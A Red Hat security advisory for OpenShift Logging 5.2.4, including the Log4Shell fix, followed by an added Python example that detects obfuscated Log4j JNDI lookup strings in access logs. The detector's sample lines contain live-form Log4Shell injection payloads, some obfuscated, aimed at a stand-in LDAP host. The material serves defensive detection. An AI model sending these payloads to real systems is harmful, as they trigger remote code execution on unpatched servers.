Red Hat Security Advisory RHSA-2021:5127-01: an update is now available for OpenShift Logging 5.2. Red Hat Product Security has rated this update as having a security impact of Moderate.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis:     Moderate: Openshift Logging security and bug update (5.2.4)
Advisory ID:  RHSA-2021:5127-01
Product:      Red Hat OpenShift Enterprise
Advisory URL: https://access.redhat.com/errata/RHSA-2021:5127
Issue date:   2021-12-14
CVE Names:    CVE-2018-25009 CVE-2018-25010 CVE-2018-25012 CVE-2018-25013 CVE-2018-25014 CVE-2019-5827 CVE-2019-13750 CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 CVE-2020-12762 CVE-2020-13435 CVE-2020-14145 CVE-2020-14155 CVE-2020-16135 CVE-2020-17541 CVE-2020-24370 CVE-2020-35521 CVE-2020-35522 CVE-2020-35523 CVE-2020-35524 CVE-2020-36330 CVE-2020-36331 CVE-2020-36332 CVE-2021-3200 CVE-2021-3426 CVE-2021-3445 CVE-2021-3481 CVE-2021-3572 CVE-2021-3580 CVE-2021-3712 CVE-2021-3800 CVE-2021-20231 CVE-2021-20232 CVE-2021-20266 CVE-2021-20317 CVE-2021-21409 CVE-2021-22876 CVE-2021-22898 CVE-2021-22925 CVE-2021-27645 CVE-2021-28153 CVE-2021-31535 CVE-2021-33560 CVE-2021-33574 CVE-2021-35942 CVE-2021-36084 CVE-2021-36085 CVE-2021-36086 CVE-2021-36087 CVE-2021-37136 CVE-2021-37137 CVE-2021-42574 CVE-2021-43267 CVE-2021-43527 CVE-2021-44228
====================================================================

1. Summary:

An update is now available for OpenShift Logging 5.2.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

2. Description:

Openshift Logging Security and Bug Fix Release (5.2.4)

Security Fix(es):

* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
* netty: Request smuggling via content-length header (CVE-2021-21409)
* netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data (CVE-2021-37136)
* netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

3. Solution:

For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:

https://docs.redhat.com/en/documentation/openshift_container_platform/4.8/html/release_notes/ocp-4-8-release-notes

For Red Hat OpenShift Logging 5.2, see the following instructions to apply this update:

https://docs.redhat.com/en/documentation/openshift_container_platform/4.7/html/logging/cluster-logging-upgrading

4. Bugs fixed (https://bugzilla.redhat.com/):

1944888 - CVE-2021-21409 netty: Request smuggling via content-length header
2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data
2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way
2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value
5. JIRA issues fixed (https://redhat.atlassian.net/jira/projects):

LOG-1775 - [release-5.2] Syslog output is serializing json incorrectly
LOG-1824 - [release-5.2] Rejected by Elasticsearch and unexpected json-parsing
LOG-1963 - [release-5.2] CLO panic: runtime error: slice bounds out of range [:-1]
LOG-1970 - Applying cluster state is causing elasticsearch to hit an issue and become unusable

6. References:

https://access.redhat.com/security/cve/CVE-2018-25009 https://access.redhat.com/security/cve/CVE-2018-25010 https://access.redhat.com/security/cve/CVE-2018-25012 https://access.redhat.com/security/cve/CVE-2018-25013 https://access.redhat.com/security/cve/CVE-2018-25014 https://access.redhat.com/security/cve/CVE-2019-5827 https://access.redhat.com/security/cve/CVE-2019-13750 https://access.redhat.com/security/cve/CVE-2019-13751 https://access.redhat.com/security/cve/CVE-2019-17594 https://access.redhat.com/security/cve/CVE-2019-17595 https://access.redhat.com/security/cve/CVE-2019-18218 https://access.redhat.com/security/cve/CVE-2019-19603 https://access.redhat.com/security/cve/CVE-2019-20838 https://access.redhat.com/security/cve/CVE-2020-12762 https://access.redhat.com/security/cve/CVE-2020-13435 https://access.redhat.com/security/cve/CVE-2020-14145 https://access.redhat.com/security/cve/CVE-2020-14155 https://access.redhat.com/security/cve/CVE-2020-16135 https://access.redhat.com/security/cve/CVE-2020-17541 https://access.redhat.com/security/cve/CVE-2020-24370 https://access.redhat.com/security/cve/CVE-2020-35521 https://access.redhat.com/security/cve/CVE-2020-35522 https://access.redhat.com/security/cve/CVE-2020-35523 https://access.redhat.com/security/cve/CVE-2020-35524 https://access.redhat.com/security/cve/CVE-2020-36330 https://access.redhat.com/security/cve/CVE-2020-36331 https://access.redhat.com/security/cve/CVE-2020-36332 https://access.redhat.com/security/cve/CVE-2021-3200 https://access.redhat.com/security/cve/CVE-2021-3426
https://access.redhat.com/security/cve/CVE-2021-3445 https://access.redhat.com/security/cve/CVE-2021-3481 https://access.redhat.com/security/cve/CVE-2021-3572 https://access.redhat.com/security/cve/CVE-2021-3580 https://access.redhat.com/security/cve/CVE-2021-3712 https://access.redhat.com/security/cve/CVE-2021-3800 https://access.redhat.com/security/cve/CVE-2021-20231 https://access.redhat.com/security/cve/CVE-2021-20232 https://access.redhat.com/security/cve/CVE-2021-20266 https://access.redhat.com/security/cve/CVE-2021-20317 https://access.redhat.com/security/cve/CVE-2021-21409 https://access.redhat.com/security/cve/CVE-2021-22876 https://access.redhat.com/security/cve/CVE-2021-22898 https://access.redhat.com/security/cve/CVE-2021-22925 https://access.redhat.com/security/cve/CVE-2021-27645 https://access.redhat.com/security/cve/CVE-2021-28153 https://access.redhat.com/security/cve/CVE-2021-31535 https://access.redhat.com/security/cve/CVE-2021-33560 https://access.redhat.com/security/cve/CVE-2021-33574 https://access.redhat.com/security/cve/CVE-2021-35942 https://access.redhat.com/security/cve/CVE-2021-36084 https://access.redhat.com/security/cve/CVE-2021-36085 https://access.redhat.com/security/cve/CVE-2021-36086 https://access.redhat.com/security/cve/CVE-2021-36087 https://access.redhat.com/security/cve/CVE-2021-37136 https://access.redhat.com/security/cve/CVE-2021-37137 https://access.redhat.com/security/cve/CVE-2021-42574 https://access.redhat.com/security/cve/CVE-2021-43267 https://access.redhat.com/security/cve/CVE-2021-43527 https://access.redhat.com/security/cve/CVE-2021-44228 https://access.redhat.com/security/updates/classification#moderate https://access.redhat.com/security/vulnerabilities/RHSB-2021-009 7. Contact: The Red Hat security contact is . More contact details at https://access.redhat.com/security/team/contact Copyright 2021 Red Hat, Inc. 
-----BEGIN PGP SIGNATURE----- Version: GnuPGv1 iQIVAwUBYbj0/dzjgjWX9erEAQhPPA//Sz4DatavDzipsjYkWatXpkjVX252NfO/ oQbzojwDm9Fjg3DgB2rKx31JAEnGUWULd9ocI3EX4KglYHF0w3HaxiIQne1IyN3O 2Oqg9OPBBZ4NCPcfGBUKUB5iAxVdQoj83kG3yR31XnWK2hM1DR3VBhyN4hi4Kjvx Az9c5ffyEV8Q7V1OsDeC0HBFrcL8P4yUTJPQlkTNwrUM3vhqn1O51MG/H7iK967c 6Zpu5GkQBitiJodlF6KFLDn/ZB6VaiCXxOYNH+ns5Q/9s/tHfBw+kHj9p0Y69fWv rw02OK7Jq8L8PA+IQLGUgS69D4aXj76xTH8TTNb9mZO+9cHLVCRhoxcLk4jVgxXi +lrJWzNalHtKa6MSSNXWVGkcddJYQi1bF0Vdk8ng9Zz59/8L27QB4odg0LEfCODv 8GqkpWh/UZuuNsFrYhSxdjnNMe1enu9ymqqh7GQm9tJYGUZ5+sNwnHpElDvPu8Jq o249oos8BiqYMgHecDWiB4nGmBk5wAOC9RIPAgpLk66UfkCw6InKm702H3+VxtQu TJcSYdFssGXYdcfSFQaMJsy89lmd/oCtT4QzocKIhVqTKMN1/HwMDUqRwqZueqOu Ww5LE6+HwOHputf1w030xz7RbE3U+n0J96c35FJ/osWXhBqELxr31uIZivyPYmTv 2e/xGkTuCyo=Qn1G -----END PGP SIGNATURE----- -- RHSA-announce mailing list
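The log4j-core fix in RHSA-2021:5127 (CVE-2021-44228) is worth a detection example, because the trigger is an attacker-controlled string that merely has to reach a log statement, and the obvious signature `${jndi:` was evaded from the first day by nesting other Log4j lookups inside it (`${${lower:j}ndi:...}`, `${${::-j}ndi:...}`, URL-encoded forms). The following added example is not Apache, Red Hat or OpenShift Logging code: it models only the lookup forms named in `_resolve` (case lookups, `:-` default values and jndi itself), and the access-log lines it scans are constructed using the 198.51.100.0/24 documentation range.

```python
"""Detecting Log4j 2 JNDI lookup strings (CVE-2021-44228, fixed in RHSA-2021:5127
above) in request or log data, including the lookup-nesting obfuscations used
to evade a naive '${jndi:' match. Added example, not Apache, Red Hat or
OpenShift Logging code; the access-log lines are constructed, using the
198.51.100.0/24 documentation range, and only the lookup forms handled in
_resolve are modelled."""
import re
from typing import List
from urllib.parse import unquote

# An innermost ${...} lookup: one with no further "${" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"jndi:", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Evaluate one innermost lookup the way Log4j's string substitution would
    for the forms attackers abuse. Unknown lookups are reduced to their text so
    the loop always terminates; a jndi lookup is kept as text to be matched."""
    if body.lower().startswith("jndi:"):
        return body
    if ":-" in body:                      # ${env:NOPE:-j} or ${::-j} -> default "j"
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep and kind.lower() == "lower":   # ${lower:J} -> j
        return arg.lower()
    if sep and kind.lower() == "upper":   # ${upper:j} -> J
        return arg.upper()
    return body                           # e.g. ${date:yyyy} -> date:yyyy


def normalize(text: str, max_rounds: int = 200) -> str:
    """URL-decode, then collapse nested lookups from the inside out until no
    ${...} remains. Each round removes at least one pair, so this finishes;
    max_rounds is only a ceiling against pathological input."""
    text = unquote(text)
    for _ in range(max_rounds):
        collapsed = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def is_log4shell(text: str) -> bool:
    """True when the text contains a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalize(text)) is not None


def find_log4shell(lines: List[str]) -> List[int]:
    """Indices of lines that carry a JNDI lookup after normalisation."""
    return [i for i, line in enumerate(lines) if is_log4shell(line)]


# Constructed sample access-log lines (indices 0 and 4 are benign).
SAMPLE_LINES = [
    '198.51.100.20 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.21 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.21 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.7/a}"',
    '198.51.100.22 - - "GET /?q=%24%7B%24%7Bupper%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 "-"',
    '198.51.100.23 - - "GET /build?v=${date:yyyy} HTTP/1.1" 200 "-"',
]

if __name__ == "__main__":
    for i in find_log4shell(SAMPLE_LINES):
        print(i, normalize(SAMPLE_LINES[i]))
```

Normalising before matching is what makes the rule hold up: the three hostile lines above reduce to the same `jndi:ldap://...` text even though none of them contains the literal `${jndi:` in the form it arrived. Detection does not replace the upgrade the advisory ships (the lookup still executes on an unpatched host), but it tells you which requests to trace back through the logging pipeline, where OpenShift Logging's collectors are themselves a log-ingesting Java surface.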